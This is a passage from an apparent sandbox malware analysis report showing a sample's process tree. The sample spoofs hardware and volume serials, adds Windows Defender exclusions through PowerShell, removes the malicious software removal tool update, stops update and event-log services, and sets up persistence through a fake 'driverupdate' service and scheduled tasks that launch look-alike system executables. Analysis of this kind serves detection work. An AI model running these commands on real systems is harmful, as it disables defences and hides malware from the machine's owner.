        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
        6⤵
        
        PID:1536
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 24500HP-TRGT9645AB
        7⤵
        
        PID:2252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
        6⤵
        
        PID:2924
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 224500HP-TRGT9645RV
        7⤵
        
        PID:3040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
        6⤵
        
        PID:2512
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 824503HP-TRGT20394SG
        7⤵
        
        PID:548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        6⤵
        
        PID:1100
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        7⤵
        
        PID:852
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
        6⤵
        
        PID:2752
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 524503HP-TRGT20394SL
        7⤵
        
        PID:872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
        6⤵
        
        PID:2148
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 424503HP-TRGT20394FA
        7⤵
        
        PID:2652
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
        6⤵
        
        PID:2548
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 624503HP-TRGT20394FU
        7⤵
        
        PID:2608
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
        6⤵
        
        PID:3064
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 324503HP-TRGT20394DQ
        7⤵
        
        PID:2456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
        6⤵
        
        PID:2724
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 724503HP-TRGT20394MST
        7⤵
        
        PID:1280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        6⤵
        
        PID:3024
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        7⤵
        
        PID:2836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
        6⤵
        
        PID:2608
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 24523HP-TRGT19348AB
        7⤵
        
        PID:1904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
        6⤵
        
        PID:2732
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 224523HP-TRGT19348RV
        7⤵
        
        PID:1248
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
        6⤵
        
        PID:2520
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 824523HP-TRGT19348SG
        7⤵
        
        PID:1972
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        6⤵
        
        PID:2724
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        7⤵
        
        PID:1668
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
        6⤵
        
        PID:3024
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 524523HP-TRGT19348SL
        7⤵
        
        PID:2688
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
        6⤵
        
        PID:2028
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 424523HP-TRGT19348FA
        7⤵
        
        PID:1164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
        6⤵
        
        PID:328
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 624523HP-TRGT19348FU
        7⤵
        
        PID:2164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
        6⤵
        
        PID:556
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 324523HP-TRGT19348DQ
        7⤵
        
        PID:2852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
        6⤵
        
        PID:2572
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 724523HP-TRGT19348MST
        7⤵
        
        PID:2324
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        6⤵
        
        PID:2596
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        7⤵
        
        PID:1644
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
        6⤵
        
        PID:808
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 24539HP-TRGT7554AB
        7⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
        6⤵
        
        PID:1688
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 224539HP-TRGT7554RV
        7⤵
        
        PID:1196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
        6⤵
        
        PID:2736
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 824539HP-TRGT7554SG
        7⤵
        
        PID:2448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        6⤵
        
        PID:1492
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        7⤵
        
        PID:2512
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
        6⤵
        
        PID:2812
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 524539HP-TRGT7554SL
        7⤵
        
        PID:2008
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
        6⤵
        
        PID:1072
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 424542HP-TRGT18303FA
        7⤵
        
        PID:2952
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
        6⤵
        
        PID:1628
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 624539HP-TRGT7554FU
        7⤵
        
        PID:2384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
        6⤵
        
        PID:2220
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 324539HP-TRGT7554DQ
        7⤵
        
        PID:1756
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
        6⤵
        
        PID:2640
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 724539HP-TRGT7554MST
        7⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        6⤵
        
        PID:108
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        7⤵
        
        PID:2652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: BKE9-P6NH
        6⤵
        
        PID:1844
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: BKE9-P6NH
        7⤵
        
        PID:2548
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: IRUR-ZC3E
        6⤵
        
        PID:2588
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: IRUR-ZC3E
        7⤵
        
        PID:1120
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 52P4-F485
        6⤵
        
        PID:1752
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 52P4-F485
        7⤵
        
        PID:1824
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 12RA-5J4H
        6⤵
        
        PID:1160
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 12RA-5J4H
        7⤵
        
        PID:456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: ID96-1VK2
        6⤵
        
        PID:1980
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: ID96-1VK2
        7⤵
        
        PID:1668
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: PJ56-9U6G
        6⤵
        
        PID:2456
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: PJ56-9U6G
        7⤵
        
        PID:2080
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 0N20-7S4D
        6⤵
        
        PID:2844
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 0N20-7S4D
        7⤵
        
        PID:2392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: C2E6-ITC6
        6⤵
        
        PID:2060
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: C2E6-ITC6
        7⤵
        
        PID:836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 03TZ-EM5T
        6⤵
        
        PID:1172
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 03TZ-EM5T
        7⤵
        
        PID:2432
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: ZAC5-RA9I
        6⤵
        
        PID:1832
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: ZAC5-RA9I
        7⤵
        
        PID:328
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: GGCK-E674
        6⤵
        
        PID:1216
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: GGCK-E674
        7⤵
        
        PID:1312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 86LT-SUB9
        6⤵
        
        PID:2876
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 86LT-SUB9
        7⤵
        
        PID:2856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: AJR0-VS6E
        6⤵
        
        PID:1536
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: AJR0-VS6E
        7⤵
        
        PID:2488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 1K48-VAPI
        6⤵
        
        PID:3020
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 1K48-VAPI
        7⤵
        
        PID:1484
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: SVLL-1HB6
        6⤵
        
        PID:2692
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: SVLL-1HB6
        7⤵
        
        PID:240
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: SJAI-13VG
        6⤵
        
        PID:1704
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: SJAI-13VG
        7⤵
        
        PID:1560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 1EAT-0GAS
        6⤵
        
        PID:524
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 1EAT-0GAS
        7⤵
        
        PID:592
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4R2G-8IS6
        6⤵
        
        PID:1952
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4R2G-8IS6
        7⤵
        
        PID:2216
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: P3EN-E9JK
        6⤵
        
        PID:2836
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: P3EN-E9JK
        7⤵
        
        PID:636
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 1NDD-39ZM
        6⤵
        
        PID:1156
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 1NDD-39ZM
        7⤵
        
        PID:2368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 2M48-FGB6
        6⤵
        
        PID:1164
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 2M48-FGB6
        7⤵
        
        PID:2720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 5C4H-1A0T
        6⤵
        
        PID:2724
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 5C4H-1A0T
        7⤵
        
        PID:1916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: EHNB-B7B4
        6⤵
        
        PID:1300
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: EHNB-B7B4
        7⤵
        
        PID:2164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
        6⤵
        
        PID:2564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
        6⤵
        
        PID:1904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
        6⤵
        
        PID:2392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
        6⤵
        
        PID:2844
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
        6⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        6⤵
        
        PID:1800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
        6⤵
        
        PID:1648
    - - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
        
        "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2184
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
        6⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
        7⤵
        
        PID:1848
        
        C:\ChainReview\sphyperRuntimedhcpSvc.exe
        
        "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
        8⤵
        
        PID:1704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Uninstall Information\explorer.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\lsass.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Favorites\taskhost.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1944
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qQO7PpT31e.bat"
        9⤵
        
        PID:2792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:576
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:1312
        
        C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe
        
        "C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe"
        10⤵
        
        PID:2244
    - - C:\Users\Admin\AppData\Roaming\conhostsft.exe
        
        "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
        5⤵
        Executes dropped EXE
        
        PID:2040
      - C:\Users\Admin\AppData\Roaming\.conhostsft.exe
        
        "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
        6⤵
        
        PID:2892
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1768
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:2952
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1688
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2104
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1740
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:1652
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:2652
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        
        PID:900
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        
        PID:812
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        
        PID:2472
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        
        PID:2916
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "driverupdate"
        7⤵
        Launches sc.exe
        
        PID:2448
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:2576
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:1804
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "driverupdate"
        7⤵
        Launches sc.exe
        
        PID:1312

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
1⤵
PID:1464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Uninstall Information\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Uninstall Information\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2408

C:\Windows\system32\schtasks.exe
